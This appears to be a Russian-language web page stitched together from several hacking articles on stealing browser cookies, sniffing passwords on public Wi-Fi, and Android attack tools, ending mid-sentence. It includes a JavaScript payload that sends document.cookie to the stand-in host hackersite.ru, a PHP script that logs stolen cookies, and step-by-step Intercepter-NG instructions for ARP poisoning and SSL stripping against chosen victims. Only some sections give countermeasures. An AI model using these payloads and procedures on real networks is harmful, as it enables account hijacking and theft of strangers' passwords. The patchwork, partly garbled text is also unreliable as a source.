Простой способ украсть cookie. Способы кражи куки файлов Скачать программу для кражи куки

Что такое же cookie?

Существует механизм, позволяющий http-серверу сохранять на компьютере пользователя некоторую текстовую информацию, а потом к ней обращаться. Данная информация называется cookie. По сути, каждая cookie - это пара: название параметра и его значение. Также каждой cookie присваивается домен, к которому она относится. В целях безопасности во всех браузерах http-серверу позволено лишь обращаться к cookie своего домена. Дополнительно cookie может иметь дату истечения, тогда они будут хранится на компьютере до этой даты, даже если закрыть все окна браузера.

Почему cookie важны?

Во всех многопользовательских системах cookie используются для идентификации пользователя. Вернее, текущего соединения пользователя с сервисом, пользовательской сессии. Если кто-то узнает Ваши cookie, то сможет зайти в систему от Вашего имени. Потому, что в настоящий момент очень мало интернет-ресурсов проверяет смену IP-адреса в течении одной пользовательской сессии.

Как изменить или подменить cookie?

Разработчики браузеров не предоставляют встроенных средств для редактирования cookie. Но можно обойтись и обычным блокнотом (notepad).

Шаг 1: создаем текстовый файл с текстом

Windows Registry Editor Version 5.00

@="C:\\IE_ext.htm"

Сохраняем его под именем IE_ext.reg

Шаг 2: С помощью созданного файла добавляем изменения в реестр Windows.

Шаг 3: создаем текстовый файл с текстом

< script language ="javascript">
external.menuArguments.clipboardData.setData("Text" , external.menuArguments.document.cookie);

external.menuArguments.document.cookie= "testname=testvalue; path=/; domain=testdomain.ru" ;
alert(external.menuArguments.document.cookie);

Сохраняем его под именем C:\IE_ext.htm

Шаг 4: Заходим на интересующий нас интернет-сайт.

Шаг 5: Правой кнопкой мыши кликам на свободном месте странице и выбираем пункт меню «Работа с Cookies» . Разрешаем доступ к буферу обмена. В буфер обмена попадут Ваши cookie данного сайт. Можете вставить их блокнот (notepad) и посмотреть.

Шаг 6: Для изменения некоторого cookie редактируем файл C:\IE_ext.htm, заменяя testname на имя cookie, testvalue - на его значение, testdomain.ru – на домен сайта. При необходимости добавляем еще подобные строчки. Для удобства контроля я добавил в скрипт вывод текущих cookie до и после изменения: alert(external.menuArguments.document.cookie);

Шаг 7: Выполняем еще раз Шаг 5, а потом обновляем страницу.

Итог: мы зайдем на данный интернет-ресурс с обновленными cookie.

Как украсть cookie с помощью JavaScript?

Если злоумышленнику удалось найти возможность выполнить произвольный JavaScript-скрипт на компьютере жертвы, то прочитать текущие cookie он может очень легко. Пример:

var str= document.cookie;

Но сможет ли он их передать на свой сайт, ведь, как я указывал ранее, JavaScript-скрипт не сможет без дополнительного подтверждения обратиться к сайту, находящемуся в другом домене? Оказывается, JavaScript-скрипт может загрузить любую картинку, находящуюся на любом http-сервере. При этом передать любую текстовую информацию в запросе на загрузку этой картинке. Пример: http://hackersite.ru/xss.jpg?text_info Поэтому если выполнить такой код:

var img=new Image();

img.src="http://hackersite.ru/xss.jpg?" + encodeURI(document.cookie);

то cookie окажутся в запросе на загрузку «картинки» и «уйдут» к злоумышленнику.

Как обрабатывать такие запросы на загрузку «картинки»?

Злоумышленнику нужно лишь найти хостинг с поддержкой php и разместить там код подобный такому:

$uid=urldecode($_SERVER["QUERY_STRING"]);
$fp=fopen("log.txt","a");
fputs($fp,"$uid\n");
fclose($fp);
?>

Тогда все параметры запросов к этому скрипту будут сохраняться в файле log.txt . Осталось лишь в ранее описанном JavaScript-скрипте заменить http://hackersite.ru/xss.jpg на путь к данному php-скрипту.

Итог

Я показал лишь самый простой способ использования XSS-уязвимостей. Но это доказывает, что наличие хотя бы одной такой уязвимостей на многопользовательском интернет-сайте может позволяет злоумышленнику пользоваться его ресурсами от Вашего имени.

Здраствуйте, эту небольшую статью, скорее даже краткое описание я бы хотел посвятить самому простому способу перехвата cookies файлов в wi-fi сети. Что такое cookies и зачем они нужны, я здесь рассказывать небуду, если человек задался идеей перехвата "выпечки"; в беспроводной сети, я думаю он должен знать, что это такое и зачем ему это надо. Скажу лишь одно, с помощью этих файлов можно получить доступ к чужим аккаунтам на различных сайтах, требующих от пользователей прохождения процесса аутентификации (Например mail.ru, vkontakte.ru и т.д.).

Итак приступим. Для начала нам нужно найти саму беспроводную сеть, с открытым шлюзом доступа в интернет, и желательно, чтобы у данной сети было достаточно много клиентов. Например, подойдет любая сеть в крупных торговых центрах, аэропортах, различных кофейнях, в таких местах люди обычно пользуются wi-fi доступом в интернет, для чтения почты, проверки аккаунтов на различных сайтах знакомств, просмотр жж и всевозможных форумов. Это все, как раз то, что нам и нужно. Определившись с выбором местоположения сети, изучив определенные часы максимального количества клиентов, перейдем непосредственно к боевым действиям. Для этого нам понадобиться ноутбук, с wi-fi адаптером, и определенным набором программ. В моем случае, я пользовался ноутбуком Acer Aspire 3610, клиентской wi-fi карточкой D-Link DWL G650 и установленной ОС BackTrack3.

Я советую вам использовать данную ОС, так как в нее уже включен весь набор программ который может понадобиться, и самое главное достоинство, то, что вам не обязательно ставить Backtrack на ваш жесткий диск, эту ОС вы можете загружать непосредственно с cd-диска или flash накопителя.

Теперь перейдем к необходимому програмному обеспечению. Я использовал kismet для обнаружение сетей, и WifiZoo, для перехвата cookies. Остановлюсь подробно на второй программе. WifiZoo является пассивным сканером эфира и собирает довольно много полезной информации, такую как: pop3, smtp traffic, http cookies/authinfo, msn, ftp credentials, telnet network traffic, nbt, и т.д. Единственный недостаток этой программы это отсутсвие режима Channel hopping, WifiZoo просто прослушивает беспроводной интерфейс, и не может, если можно так выразиться прыгать с канала на канал. Но этот недостаток компенсируется с помощью другой программы, Kismet, которая поддерживает этот режим. Для запуска WifiZoo вам понадобиться:

python
scapy
Kismet

Итак запускаем программу, для начала запустим Kismet, для поддержки режима channel hopping, далее запускаем непосредственно WifiZoo, перед вами должно появиться вот такое окно:

Теперь осталось только сидеть и ждать пока вы чтонибудь перехватите, все что перехватывает программа можно найти в логах, которые находятся в директории с программой /logs/. Так же вы можете запустить GUI интерфейс, который автоматически поднимается на http по адрессу 127.0.0.1:8000

Писать про все особенности этой замечательной программы я не буду, думаю вы сами разберетесь в остальных возможностях, и так как в данный момент нас интересуют только cookies. Кликаем по ссылке с надписью cookies и смотрим, что же мы перехватили:

Задумывались ли вы когда-нибудь о том, как на некоторых Web-узлах происходит персонификация посетителей? Это может выражаться, например, в запоминании содержимого "тележки" (если этот узел предназначен для продажи товаров) или в способе заполнения полей какой-нибудь формы. В протоколе HTTP, лежащем в основе функционирования World Wide Web, нет средств, позволяющих отслеживать события от одного посещения узла к другому, поэтому для возможности хранения таких "состояний" было разработано специальное дополнение. Этот механизм, описанный в документе RFC 2109, обеспечивает вставку в передаваемые запросы и ответы HTTP специальных фрагментов данных cookie, позволяющих Web-узлам отслеживать своих посетителей.

Данные cookie могут запоминаться на время сеанса связи (per session ), оставаясь в оперативной памяти в течение одного сеанса и удаляясь при закрытии браузера, или даже после истечения заданного промежутка времени. В других случаях они бывают постоянными (persistent ), оставаясь на жестком диске пользователя в виде текстового файла. Обычно они хранятся в каталоге Cookies (%windir% \Cookies - в Win9x и %userprofile%\Cookies - в NT/2000). Нетрудно догадаться, что после захвата файлов cookie в Internet взломщик может выдавать себя за пользователя данного компьютера, или собирать содержащуюся в этих файлах важную информацию. Прочитав следующие разделы, вы поймете, насколько просто это сделать.

Перехват файлов cookie

Самый прямой способ заключается в перехвате файлов cookie при их передаче по сети. Затем перехваченные данные можно использовать при входе на соответствующий сервер. Такую задачу можно решить с помощью любой утилиты перехвата пакетов, однако одной из лучших является программа Лаврентия Никулы (Laurentiu Nicula ) SpyNet/PeepNet . В состав SpyNet входят две утилиты, которые работают в комплексе. Программа CaptureNet выполняет захват самого пакета и сохраняет его на диске, а утилита PeepNet открывает этот файл и преобразует его в читабельный формат. Следующий пример является фрагментом восстановленного программой PeepNet сеанса связи, во время которого файл cookie служит для аутентификации и управления доступом к просматриваемым страницам (для сохранения анонимности имена изменены).

GET http://www.victim.net/images/logo.gif HTTP/1.0 Accept: */* Referrer: http://www.victim.net/ Host: www.victim.net Cookie: jrunsessionid=96114024278141622; cuid=TORPM!ZXTFRLRlpWTVFISEblahblah

В приведенном примере виден фрагмент cookie, помещенный в поступающий на сервер запрос HTTP. Наиболее важным является поле cuid= , в котором задается уникальный идентификатор, используемый при аутентификации пользователя на узле www.victim.net. Допустим, что после этого взломщик посетил узел victim.net, получил собственный идентификатор и файл cookie (предполагается, что узел помещает данные cookie не в виртуальную память, а записывает их на жесткий диск). Тогда взломщик может открыть свой собственный файл cookie и заменить в нем идентификатор поля cuid=, взяв его из перехваченного пакета. В этом случае при входе на сервер victim.net он будет восприниматься как пользователь, чьи данные cookie были перехвачены.

Способность программы PeepNet воспроизводить весь сеанс связи или его фрагмент значительно облегчает реализацию атак этого типа. С помощью кнопки Go get it! можно повторно извлечь страницы, которые просматривались пользователем, используя его данные cookie, перехваченные ранее программой CaptureNet. В диалоговом окне утилиты PeepNet можно увидеть информацию о чьих-то выполненных распоряжениях. При этом для аутентификации используются данные cookie, перехваченные программой CaptureNet. Обратите внимание на фрейм, расположенный в нижнем правом углу диалогового окна с данными сеанса связи, и на строку, которая следует за строкой Cookie:. Это данные cookie, используемые при аутентификации.

Это довольно ловкий трюк. Кроме того, утилита CaptureNet может предоставить полную запись трафика в расшифрованном виде, что практически равносильно возможностям утилит профессионального класса, таких как Sniffer Pro компании Network Associates, Inc. Однако утилита SpyNet еще лучше - ее можно получить бесплатно!

Контрмеры

Следует остерегаться узлов, на которых файлы cookie применяются для аутентификации и хранения важных идентификационных данных. Одним из инструментов, помогающих в обеспечении защиты, является программа Cookie Pal компании Kookaburra Software, которую можно найти на Web-узле http://www.kburra.com/cpal.html . Этот программный продукт можно настроить так, чтобы для пользователя генерировались предупреждающие сообщения о попытках Web-узла воспользоваться механизмом cookie. При этом можно "заглянуть за кулисы" и решить, следует ли разрешать выполнение этих действий. В Internet Explorer имеется встроенный механизм поддержки файлов cookie. Чтобы активизировать его, запустите аплет Internet Options панели управления, перейдите во вкладку Security, выберите элемент Internet Zone, установите режим Custom Level и для постоянных и временных данных cookie установите переключатель в положение Prompt. Настройка использования файлов cookie в браузере Netscape выполняется с помощью команды Edit › Preferences › Advanced и установки режима Warn me before accepting a cookie или Disable cookies (рис. 16.3). Принимая файл cookie, нужно проверить, записался ли он на диск, и узнать, собирает ли Web-узел информацию о пользователях.

Посещая узел, на котором файлы cookie служат для аутентификации, необходимо убедиться, что первоначально сообщаемые имя и пароль шифруются хотя бы с помощью протокола SSL. Тогда эта информация появится в окне программы PeepNet по меньшей мере не в виде простого текста.

Авторы предпочли бы полностью отказаться от файлов cookie, если бы многие часто посещаемые Web-узлы не требовали этого режима. Например, для популярной во всем мире службы Hotmail компании Microsoft наличие файлов cookie обязательно для регистрации. Поскольку эта служба в процессе аутентификации задействует несколько различных серверов, то добавить их в зону надежных узлов не так-то просто (этот процесс описан в разделе "Разумное Использование Зон Безопасности: Общее Решение Проблемы Элементов Activex"). В этом случае поможет обозначение *.hotmail.com. Файлы cookie - далеко не идеальное решение проблемы неполноты протокола HTML, однако альтернативные подходы, по-видимому, еще хуже (например, добавление к адресу URL идентификатора, который может храниться на proxy-серверах). Пока не появится идея получше, единственным выходом остается контроль над файлами cookie с помощью перечисленных выше методов.

Захват файлов cookie через URL

Представим себе нечто ужасное: пользователи Internet Explorer щелкают на специально сконструированных гиперссылках и становятся потенциальными жертвами, рискуя, что их файлы cookie будут перехвачены. Беннет Хазельтон (Bennett Haselton ) и Джеми Маккарти (Jamie McCarthy ) из тинейджерской организации Peacefire, ратующей за свободу общения через Internet, опубликовали сценарий, воплощающий эту идею в жизнь. Этот сценарий извлекает файлы cookie с клиентского компьютера, если его пользователь щелкает на ссылке, содержащейся на этой странице. В результате содержимое файла cookie становится доступным для операторов Web-узла.

Эту возможность можно использовать в неблаговидных целях, внедряя дескрипторы IFRAME в HTML-код Web-страницы, электронного сообщения в формате HTML или сообщения из группы новостей. В следующем примере, предложенном консультантом по вопросам безопасности Ричардом М. Смитом, демонстрируется возможность использования дескрипторов IFRAME совместно с утилитой, разработанной организацией Peacefire.

</p><p>Можно составить коварное электронное сообщение, которое "захватывало" бы файлы cookie с <a href="/kak-zagruzit-kompyuter-bez-zhestkogo-diska-probuem-zapustit-kompyuter-ili/">жесткого диска</a> пользователя и передавало их операторам узла peacefire.org. Для этого в него много раз нужно поместить ссылку на этот узел так, как показано в примерю. Несмотря на то что ребята из Peacefire выглядят довольно приятными людьми, вряд ли кому-нибудь понравится, если к ним в руки попадут конфиденциальные данные.</p> <h3>Контрмеры</h3> <p>Установите модуль обновления, который можно найти по адресу http://www.microsoft.com/technet/security/bulletin/ms00-033.asp . Можно воспользоваться также программой <b>Cookie Pal </b> или встроенными возможностями Internet Explorer, как описано выше.</p> <p>О том, чем опасны открытые точки <a href="/sdelat-kompyuter-tochkoi-dostupa-wifi-windows-7-noutbuk-kak-tochka/">доступа Wifi</a>, о том что могут перехватить пароли. </p> <p>Сегодня рассмотрим перехват паролей по Wi Fi и перехват куки по Wi Fi при помощи программы . </p> <p>Атака будет происходить за счет <b>сниффинга (Sniffing) </b>. </span><br><span> <p><b>Sniffing </b> — sniff переводится как «Нюхать». Сниффинг позволяет анализировать <a href="/programma-dlya-otslezhivaniya-kompyuterov-v-lokalnoi-seti-kak/">сетевую активность</a> в сети, просматривать какие сайты посещает пользователь и перехватывать пароли. Но может быть использовано и в полезных целях, для прослушки вирусов, которые отправляют какие либо данные в интернет.</p></p> <p><img src='https://i2.wp.com/teralex.ru/wp-content/uploads/2015/06/intercepter.png' width="100%" loading=lazy><br><span>Способ буду показывать довольно примитивный и простой. На самом деле можно более сильно использовать программу. </span><br><span>Официальный сайт программы sniff.su (скопируйте ссылку и откройте в новой вкладке), скачать её можно в разделе <b>«Download» </b>. </span><br><span>Есть версия для Windows, <a href="/unix-standartizaciya-operacionnyh-sistem-i-posix-posix-i-os-rv-popytka/">Unix систем</a> и для андроид. </span><br><span>Рассматривать будем для Windows так как это самая популярная система и здесь программа самая продвинутая. </span><br><span>Ваш браузер или антивирус может ругаться что программа опасна, но сами понимаете это хак программа, а на такие всегда будет реагировать. </span><br><span>Скачивается программа в zip архиве, программу нужно лишь распаковать и в папку и пользоваться устанавливать ничего нет необходимости. </span><br><span>Программа имеет возможность устраивать различные Mitm атаки на Wi Fi сети. </span><br><span>Статья написана чисто в ознакомительных целях, чтобы показать на примере о опасностях открытых <a href="/programma-dlya-sozdaniya-virtualnoi-tochki-dostupa-wifi-programmy/">точек WiFi</a> любые указанные действия, вы выполняете на свой страх и риск. И хочу напомнить об уголовной ответственности защищающей чужие данные. </p> <p>Сервис <b>ави1 </b> предлагает умопомрачительно дешевые цены на возможность заказать подписчиков на свой профиль в Инстаграме. Добейтесь увеличения популярности в сети или продаж уже сейчас, не затрачивая массу усилий и времени.</p> <p><b>Работа с программой Intercepter NG </b> </p> <p>Итак, программа запускается через Intercepter-NG.exe . </span><br><span>Программа имеет английский интерфейс, но если вы уверенный пользователь компьютера думаю вы разберетесь. </p> <p>Внизу будет видео по настройке (для тех кому удобнее смотреть чем читать). </span><br><span>— Выбираете <a href="/dlya-chego-nuzhen-kommutator-v-lokalnoi-seti-stroim-domashnyuyu-set/">нужную сеть</a> в верху если их у вас несколько. </span><br><span>— Переключаете тип <b>Ethernet/WiFi </b> , если у вас Wi Fi то необходимо выбрать значок Wi FI (левее от выбора сети) </p> <p><img src='https://i1.wp.com/teralex.ru/wp-content/uploads/2015/06/intercepter-ng.png' width="100%" loading=lazy></p> <p>— Нажимаете кнопку <b>Scan Mode </b> (значок радара) </span><br><span>— В пустом поле щелкаете правой кнопкой мышки и нажимаете в <a href="/kak-dobavit-novoe-v-kontekstnoe-menyu-kak-izmenit-menyu-pravoi-knopki/">контекстном меню</a> <b>Smart scan </b> </span><br><span>— Покажутся все подключенные устройства к сети </span><br><span>— Выбираете жертву (можно выделить всех с зажатой клавишей Shift), только не отмечайте сам роутер, его Ip обычно 192.168.1.1 </span><br><span>— Выделив нажимаем правой кнопкой мыши и нажимаем <b>Add to nat </b> </p> <p><img src='https://i0.wp.com/teralex.ru/wp-content/uploads/2015/06/intercepter-ng-2.png' width="100%" loading=lazy><br><span>— Переходим во вкладку <b>Nat </b> </span><br><span>— В <b>Stealth ip </b> желательно изменить последнюю цифру, на любую не занятую, это позволит скрыть ваш настоящий IP. </span><br><span>— Ставим галочки на <b>SSl Strip </b> и <b>SSL Mitm </b>. </p> <p><img src='https://i0.wp.com/teralex.ru/wp-content/uploads/2015/06/intercepter-ng3.png' width="100%" loading=lazy><br><span>— Нажимаем <b>Settings </b> (шестеренки справа) . </span><br><span>— Ставим галочку на <b>Resurrection </b> (Это позволит перехватывать пароли и куки шифрованного Https протокола) и Снимаем <b>Spoof IP/Mac </b> . Можно поставить галочку на <b>Cookie Killer </b>, благодаря ей, жертву выкинет из текущей странички например социальной сети и жертве придется ввести заново пароль, а мы уже его перехватим. Сравните настройки с картинкой. </p> <p><img src='https://i2.wp.com/teralex.ru/wp-content/uploads/2015/06/intercepter-ng4.png' width="100%" loading=lazy><br><span>— Здесь настройка завершена, закрываем настройки на галочку. </span><br><span>— Настройка завершена, можно приступать к атаке. </span><br><span>— Нажимаете вверху кнопку <b>Start/stop sniffing </b> (треугольник), в том же окне нажимаем внизу значок радиации <b>Start/Stop ARP Poison </b> </span><br><span>— Перейдите во вкладку <b>Password mode </b> и нажмите в окне правой кнопкой мыши и выберите <b>Show Cookies </b> («Это позволит показывать куки и пароли вводимые жертвами») </span><br><span>Всё, ждем когда кто нибудь введет пароль. </span><br><span>Иногда случается что перестает работать интернет, попробуйте попробовать сами зайти в интернет, если не работает перезапустите программу. </span><br><span>Заметил что не всегда получается перехватить пароль, но по сути срабатывает практически без отказа. </p> <p><span class="lQtCdmIb7Dg"></span></p> <p>Вот собственно и всё, мы рассмотрели перехват паролей по Wi Fi и перехват куки по Wi Fi. </p> <p><b> Берегите себя </b></p> <p>«Смартфон с хакерскими утилитами? Нет такого», - еще недавно сказали бы мы тебе. Запустить каике-то привычные инструменты для реализации атак можно было разве что на каком-нибудь Maemo. Теперь же многие привычные инструменты портировали под iOS и Android, а некоторые хак-тулзы были специально написаны для мобильного окружения. Может ли смартфон заменить ноутбук в тестах на проникновение? Мы решили проверить. </p><h2>ANDROID</h2> Android - популярная платформа не только для простых смертных, но и для правильных людей. Количество полезных ][-утилит здесь просто зашкаливает. За это можно сказать спасибо UNIX-корням системы - это значительно упростило портирование многих инструментов на Android. Увы, некоторые из них Google не пускает в Play Store, так что придется ставить соответствующие APK вручную. Также для некоторых утилит нужен максимальный доступ к системе (например, файрволу iptables), поэтому следует заранее позаботиться о root-доступе. Для каждого производителя здесь используется собственная технология, но найти необходимую инструкцию достаточно просто. Неплохой набор HOWTO собрал ресурс LifeHacker (bit.ly/eWgDlu). Однако если какой-то модели тут найти не удалось, на помощь всегда приходит форум XDA-Developers (www.xda-developers.com), на котором можно найти <a href="/moya-stranica-v-kontakte-bystryi-vhod-bez-kak-voiti-vkontakte-razlichnymi/">различную информацию</a> фактически по любой модели Android-телефона. Так или иначе, часть из ниже описанных утилит заработают и без root-доступа. <h2>Менеджер пакетов</h2> BotBrew Начнем обзор с необычного менеджера пакетов. Разработчики называют его «утилитами для суперпользователей», и это недалеко от правды. После установки BotBrew ты получаешь репозиторий, откуда можешь загрузить огромное количество скомпилированных под Android привычных инструментов. Среди них: интерпретаторы Python и Ruby для запуска многочисленных инструментов, которые на них написаны, сниффер tcpdump и сканер Nmap для анализа сети, Git и Subversion для работы с системами контроля версий и многое другое. <h2>Сетевые сканеры</h2> PIPS <img src='https://i0.wp.com/xakep.ru/wp-content/uploads/2014/12/ANDROID_PIPS.jpg' align="center" height="512" width="288" loading=lazy> Незаметный смартфон, который в отличие от ноутбука легко помещается в карман и никогда не вызывает подозрений, может быть полезен для исследования сети. Выше мы уже сказали, как можно установить Nmap, но есть еще один вариант. PIPS - это специально адаптированный под Android, хотя и неофициальный порт сканера Nmap. А значит, ты сможешь быстро найти активные устройства в сети, определить их ОС с помощью опций по fingerprinting’у, провести сканирование портов - короче говоря, сделать все, на что способен Nmap. Fing <img src='https://i1.wp.com/xakep.ru/wp-content/uploads/2014/12/ANDROID_Fing.jpg' align="center" height="512" width="307" loading=lazy> С использованием Nmap’а, несмотря на всю его мощь, есть две проблемы. Во-первых, параметры для сканирования передаются через ключи для запуска, которые надо не только знать, но еще и суметь ввести с неудобной мобильной клавиатуры. А во-вторых, результаты сканирования в консольном выводе не такие наглядные, как того хотелось бы. Этих недостатков лишен сканнер Fing, который очень быстро сканирует сеть, делает fingerprinting, после чего в понятной форме выводит список всех доступных устройств, разделяя их по типам (роутер, десктоп, iPhone и так далее). При этом по каждому хосту можно быстро посмотреть список открытых портов. Причем прямо отсюда можно подключиться, скажем, к FTP, используя установленный в системе FTP-клиент, - очень удобно. NetAudit <img src='https://i2.wp.com/xakep.ru/wp-content/uploads/2014/12/ANDROID_Net_Tools.jpg' align="center" height="512" width="288" loading=lazy> Когда речь идет об анализе конкретного хоста, незаменимой может оказаться утилита NetAudit. Она работает на любом Android-устройстве (даже нерутованном) и позволяет не только быстро определить устройства в сети, но и исследовать их с помощью большой fingerprinting-базы для определения <a href="/net-framework-4-dlya-64-bitnoi-sistemy-podderzhivaemaya-operacionnaya-sistema/">операционной системы</a>, а также CMS-систем, используемых на веб-сервере. Сейчас в базе более 3000 цифровых отпечатков. Net Tools <img src='https://i2.wp.com/xakep.ru/wp-content/uploads/2014/12/ANDROID_Net_Tools.jpg' align="center" height="512" width="288" loading=lazy> Если же нужно, напротив, работать на уровне ниже и тщательно исследовать работу сети, то здесь не обойтись без Net Tools. Это незаменимый в работе <a href="/uvedomleniya-razresheno-administratorom-google-chrome-kak-otklyuchit-parametr/">системного администратора</a> набор утилит, позволяющий полностью продиагностировать работу сети, к которой подключено устройство. Пакет содержит более 15 различного рода программ, таких как ping, traceroute, arp, dns, netstat, route. <h2>Манипуляции с трафиком</h2> Shark for Root <img src='https://i0.wp.com/xakep.ru/wp-content/uploads/2014/12/ANDROID_Shark.png' height="336" width="224" loading=lazy> Основанный на tcpdump сниффер честно логирует в pcap-файл все данные, которые далее можно изучить с помощью привычных утилит вроде Wireshark или Network Miner. Так как никакие возможности для MITM-атак в нем не реализованы, это скорее инструмент для анализа своего трафика. К примеру, это отличный способ изучить то, что передают программы, установленные на твой девайс из сомнительных репозиториев. FaceNiff <img src='https://i1.wp.com/xakep.ru/wp-content/uploads/2014/12/ANDROID_FaceNIFF.jpg' align="center" height="452" width="256" loading=lazy> Если говорить о боевых приложениях для Android, то одним из самых нашумевших является FaceNiff, реализующий перехват и внедрение в перехваченные веб-сессии. Скачав APK-пакет с программой, можно практически на любом Android-смартфоне запустить этот хек-инструмент и, подключившись к беспроводной сети, перехватывать аккаунты самых разных сервисов: Facebook, Twitter, «ВКонтакте» и так далее - всего более десяти. Угон сессии осуществляется средствами применения атаки ARP spoofing, но атака возможна только на незащищенных соединениях (вклиниваться в SSL-трафик FaceNiff не умеет). Чтобы сдержать поток скрипткидисов, автор ограничил максимальное число сессий тремя - дальше нужно обратиться к разработчику за специальным активационным кодом. DroidSheep <img src='https://i0.wp.com/xakep.ru/wp-content/uploads/2014/12/ANDROID_DroidSheep.jpg' align="center" height="800" width="480" loading=lazy> Если создатель FaceNiff хочет за использование денежку, то DroidSheep - это полностью бесплатный инструмент с тем же функционалом. Правда, на официальном сайте ты не найдешь дистрибутива (это связано с суровыми законами Германии по части security-утилит), но его без проблем можно найти в Сети. Основная задача утилиты - перехват пользовательских веб-сессий популярных <a href="/odnoklassniki-socialnaya-set-novaya-stranica-odnoklassniki-socialnaya/">социальных сетей</a>, реализованный с помощью все того же ARP Spoofing’а. А вот с безопасными подключениями беда: как и FaceNiff, DroidSheep наотрез отказывается работать с HTTPS-протоколом. Network Spoofer <img src='https://i2.wp.com/xakep.ru/wp-content/uploads/2014/12/ANDROID_Network_Spoofer.png' align="center" height="800" width="480" loading=lazy> Эта утилита также демонстрирует небезопасность открытых <a href="/kak-skachat-draiver-besprovodnoi-seti-draiver-pak-dlya-setevyh/">беспроводных сетей</a>, но несколько в другой плоскости. Она не перехватывает пользовательские сессии, но позволяет с помощью спуфинг-атаки пропускать HTTP-трафик через себя, выполняя с ним заданные манипуляции. Начиная от обычных шалостей (заменить все картинки на сайте троллфейсами, перевернуть все изображения или, скажем, подменив <a href="/chto-takoe-personalizaciya-poiskovoi-vydachi-personalizirovannyi-poisk-google-chto-takoe-personificirov/">выдачу Google</a>) и заканчивая фишинговыми атаками, когда пользователю подсовываются фейковые страницы таких популярных сервисов, как facebook.com, linkedin.com, vkontakte.ru и многих других. Anti (Android Network Toolkit by zImperium LTD) <br><img src='https://i0.wp.com/xakep.ru/wp-content/uploads/2014/12/ANDROID_ANTI.jpg' align="center" width="100%" loading=lazy> Если спросить, какая хак-утилита для Android наиболее мощная, то у Anti, пожалуй, конкурентов нет. Это настоящий хакерский комбайн. Основная задача программы - сканирование сетевого периметра. Далее в бой вступают различные модули, с помощью которых реализован целый арсенал: это и прослушка трафика, и выполнение MITM-атак, и эксплуатация найденных уязвимостей. Правда, есть и свои минусы. Первое, что бросается в глаза, - эксплуатация уязвимостей производится лишь с центрального сервера программы, который находится в интернете, вследствие чего о целях, не имеющих внешний IP-адрес, можно забыть. <h2>Туннелирование трафика</h2> Total Commander <img src='https://i1.wp.com/xakep.ru/wp-content/uploads/2014/12/Android_TotalCommander.jpg' align="center" height="512" width="307" loading=lazy> Хорошо известный <a href="/failovyi-menedzher-linux-kakoi-luchshii-fail-menedzher-v-linux-kak-perenaznachit-failovyi-menedzher-na/">файловый менеджер</a> теперь и на смартфонах! Как и в настольной версии, тут предусмотрена система плагинов для подключения к различным сетевым директориям, а также канонический двухпанельный режим - особенно удобно на планшетах. SSH Tunnel <img src='https://i2.wp.com/xakep.ru/wp-content/uploads/2014/12/ANDROID_SSH_Tunnel.jpg' align="center" height="512" width="288" loading=lazy> Хорошо, но как обеспечить безопасность своих данных, которые передаются в открытой беспроводной сети? Помимо VPN, который Android поддерживает из коробки, можно поднять SSH-туннель. Для этого есть замечательная утилита SSH Tunnel, которая позволяет завернуть через удаленный SSH-сервер трафик выбранных приложений или всей системы в целом. ProxyDroid Часто бывает необходимо пустить трафик через прокси или сокс, и в этом случае выручит ProxyDroid. Все просто: выбираешь, трафик каких приложений нужно туннелировать, и указываешь прокси (поддерживаются HTTP/HTTPS/SOCKS4/SOCKS5). Если требуется авторизация, то ProxyDroid это также поддерживает. К слову, конфигурацию можно забиндить на определенную беспроводную сеть, сделав <a href="/izmenenie-tonalnosti-muzykalnogo-treka-osnovnye-instrumenty-i/">разные настройки</a> для каждой из них. <h2>Беспроводные сети</h2> Wifi Analyzer Встроенный менеджер беспроводных сетей не отличается информативностью. Если нужно быстро получить полную картину о находящихся рядом точках доступа, то утилита Wifi Analyzer - отличный выбор. Она не только покажет все находящиеся рядом точки доступа, но и отобразит канал, на котором они работают, их MAC-адрес и, что важнее всего, используемый тип шифрования (увидев заветные буквы «WEP», можно считать, что доступ в защищенную сеть обеспечен). Помимо этого утилита идеально подойдет, если нужно найти, где физически находится нужная точка доступа, благодаря наглядному индикатору уровня сигнала. WiFiKill Эта утилита, как заявляет ее разработчик, может быть полезна, когда беспроводная сеть под завязку забита клиентами, которые используют весь канал, а именно в этот момент нужен хороший коннект и стабильная связь. WiFiKill позволяет отключить клиентов от интернета как выборочно, так и по определенному критерию (к примеру, возможно постебаться над всеми яблочниками). Программа всего-навсего выполняет атаку ARP spoofing и перенаправляет всех клиентов на самих себя. Этот алгоритм до глупости просто реализован на базе iptables. Такая вот панель управления для беспроводных сетей фастфуда:). <h2>Аудит веб-приложений</h2> HTTP Query Builder <img src='https://i0.wp.com/xakep.ru/wp-content/uploads/2014/12/ANDROID_HTTP_Query_Builder.jpg' align="center" height="512" width="307" loading=lazy> Манипулировать HTTP-запросами с компьютера - плевое дело, для этого есть огромное количество утилит и плагинов для браузеров. В случае со смартфоном все немного сложнее. Отправить кастомный HTTP-запрос с нужными тебе параметрами, например нужной cookie или измененным User-Agent, поможет HTTP Query Builder. Результат выполнения запроса будет отображен в стандартном браузере. Router Brute Force ADS 2 <img src='https://i0.wp.com/xakep.ru/wp-content/uploads/2014/12/ANDROID_RouterBruteForceADS.jpg' align="center" height="512" width="307" loading=lazy> Если сайт <a href="/kak-snyat-zapret-na-redaktirovanie-word-kak-ustanovit-ili-snyat/">защищен паролем</a> с помощью Basic Access Authentication, то проверить его надежность можно с помощью утилиты Router Brute Force ADS 2. Изначально утилита создавалась для брутфорса паролей на админки роутера, но понятно, что она может быть использована и против любого другого ресурса с аналогичной защитой. Утилита работает, но явно сыровата. К примеру, разработчиком не предусмотрен грубый перебор, а возможен только брутфорс по словарю. AnDOSid <img src='https://i1.wp.com/xakep.ru/wp-content/uploads/2014/12/ANDROID_AnDOSid.jpg' align="center" height="480" width="320" loading=lazy> Наверняка ты слышал о такой нашумевшей программе вывода из строя веб-серверов, как Slowloris. Принцип ее действия: создать и удерживать максимальное количество подключений с удаленным веб-сервером, таким образом не давая подключиться к нему новым клиентам. Так вот, AnDOSid - аналог Slowloris прямо в Android-девайсе! Скажу по секрету, двухсот подключений достаточно, чтобы обеспечить нестабильную работу каждому четвертому веб-сайту под управлением веб-сервера Apache. И все это - с твоего телефона! <h2>Разные полезности</h2> Encode <img src='https://i1.wp.com/xakep.ru/wp-content/uploads/2014/12/ANDROID_Encode.png' align="center" height="512" width="307" loading=lazy> При работе с многими веб-приложениями и анализе их логики достаточно часто встречаются данные, передаваемые в закодированным виде, а именно Base64. Encode поможет тебе раскодировать эти данные и посмотреть, что же именно в них хранится. Возможно, подставив кавычку, закодировав их обратно в Base64 и подставив в URL исследуемого сайта, ты получишь заветную ошибку выполнения запроса к базе данных. HexEditor Если нужен 